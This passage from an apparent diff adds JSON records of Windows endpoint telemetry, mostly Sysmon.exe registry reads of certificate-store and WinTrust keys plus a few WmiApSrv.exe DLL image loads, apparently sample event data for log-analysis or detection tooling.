}, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WmiApSrv.exe", + "image_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "psapi.dll", + "image_path": "C:\\Windows\\System32\\psapi.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "loadperf.dll", + "image_path": "C:\\Windows\\System32\\loadperf.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 